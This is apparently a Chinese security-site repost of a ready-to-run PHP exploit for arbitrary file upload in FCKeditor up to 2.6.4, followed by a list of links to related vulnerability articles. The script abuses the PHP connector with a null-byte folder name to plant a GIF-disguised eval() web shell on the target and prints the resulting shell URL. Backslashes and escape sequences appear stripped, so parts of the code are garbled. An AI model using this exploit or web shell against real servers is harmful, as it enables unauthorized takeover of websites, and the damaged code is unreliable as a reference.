fckeditor<=2.6.4任意檔案上傳漏洞

cnbird發表於2013-07-16

<?





error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);



define(STDIN, fopen("php://stdin", "r"));

$match = array();



function http_send($host, $packet)

{

	$sock = fsockopen($host, 80);

	while (!$sock)

	{

		print "
[-] No response from {$host}:80 Trying again...";

		$sock = fsockopen($host, 80);

	}

	fputs($sock, $packet);

	while (!feof($sock)) $resp .= fread($sock, 1024);

	fclose($sock);

	print $resp;

	return $resp;

}



function connector_response($html)

{

	global $match;

	return (preg_match("/OnUploadCompleted((d),"(.*)")/", $html, $match) && in_array($match[1], array(0, 201)));

}



print "
+------------------------------------------------------------------+";

print "
| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";

print "
+------------------------------------------------------------------+
";



if ($argc < 3)

{

	print "
Usage......: php $argv[0] host path
";

	print "
Example....: php $argv[0] localhost /
";

	print "
Example....: php $argv[0] localhost /FCKEditor/
";



	die();

}



$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);



$filename  = "fvck.gif";

$foldername = "fuck.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";





$payload  = "-----------------------------265001916915724
";

$payload .= "Content-Disposition: form-data; name="NewFile"; filename="{$filename}"
";

$payload .= "Content-Type:  image/jpeg

";

$payload .= `GIF89a`."
".`<?php eval($_POST[a]) ?>`."
";

$payload .= "-----------------------------265001916915724--
";



$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0
";

//print $packet;

$packet	.= "Host: {$host}
";



$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724
";

$packet .= "Content-Length: ".strlen($payload)."
";

$packet .= "Connection: close

";

$packet .= $payload;



print $packet;



if (!connector_response(http_send($host, $packet))) die("
[-] Upload failed!
");

else print "
[-] Job done! try http://${host}/$match[2] 
";





?>

任意檔案上傳漏洞修復
2018-05-09
文字檔案上傳漏洞[任意.繞過.解析]
2019-08-04
安全漏洞問題5：上傳任意檔案
2017-11-21
PHP未明遠端任意檔案上傳漏洞(轉)
2007-09-19
PHP
檔案上傳漏洞
2024-04-22
WEB漏洞——檔案上傳
2021-09-12
Web
米安程式碼審計 06 PHPYUN V3.0 任意檔案上傳漏洞
2018-07-24
PHP
Web安全-檔案上傳漏洞
2018-12-29
Web
淺析檔案上傳漏洞
2020-10-20
WEB安全：檔案上傳漏洞
2016-11-24
Web
fckeditor上傳突破_方法
2012-05-02
檔案包含漏洞(本地包含配合檔案上傳)
2018-08-06
phpcmsv9.0任意上傳漏洞
2020-10-19
PHP
＜web滲透-檔案上傳漏洞＞
2020-11-20
Web
檔案上傳（解析）漏洞詳解
2020-11-27
檔案上傳漏洞總結（全)
2021-11-14
2.6.4 指定控制檔案
2020-03-09
Web 安全漏洞之檔案上傳
2019-07-01
Web
檔案上傳漏洞（繞過姿勢）
2018-06-23
Vmware Vcenter 任意檔案讀取漏洞
2020-10-14
網站漏洞修復之Metinfo 檔案上傳漏洞
2019-07-12
網站
解析漏洞與檔案上傳漏洞—一對好兄弟
2018-03-21
3. 檔案上傳漏洞——漏洞總結筆記
2024-03-26
筆記
Struts2教程7：上傳任意多個檔案
2008-04-27
漏洞重溫之檔案上傳（總結）
2020-08-12
ctfshow檔案上傳漏洞做題記錄
2024-03-08
FCKeditor 上傳ftp asp.net
2011-11-21
FTPASP.NET
新型任意檔案讀取漏洞的研究
2020-08-19
phpcms的phpcms_auth導致的任意變數覆蓋漏洞、本地檔案包含漏洞和任意檔案下載漏洞
2017-11-10
PHP變數
檔案上傳之解析漏洞編輯器安全
2021-08-10
米安程式碼審計 05 檔案上傳漏洞
2018-07-24
php檔案上傳之多檔案上傳
2015-07-24
PHP
【檔案上傳繞過】路徑拼接問題導致上傳漏洞
2020-10-10
WebLogic 任意檔案上傳遠端程式碼執行_CVE-2018-2894漏洞復現
2019-07-14
Web
檔案上傳漏洞全面滲透姿勢總結
2021-03-18
墨者學院WebShell檔案上傳漏洞分析溯源
2020-10-22
Webshell
突破上傳之檔案包含漏洞以及修復方案
2016-10-11
PHP檔案上傳漏洞原理以及防禦姿勢
2018-06-11
PHP

fckeditor<=2.6.4任意檔案上傳漏洞

相關文章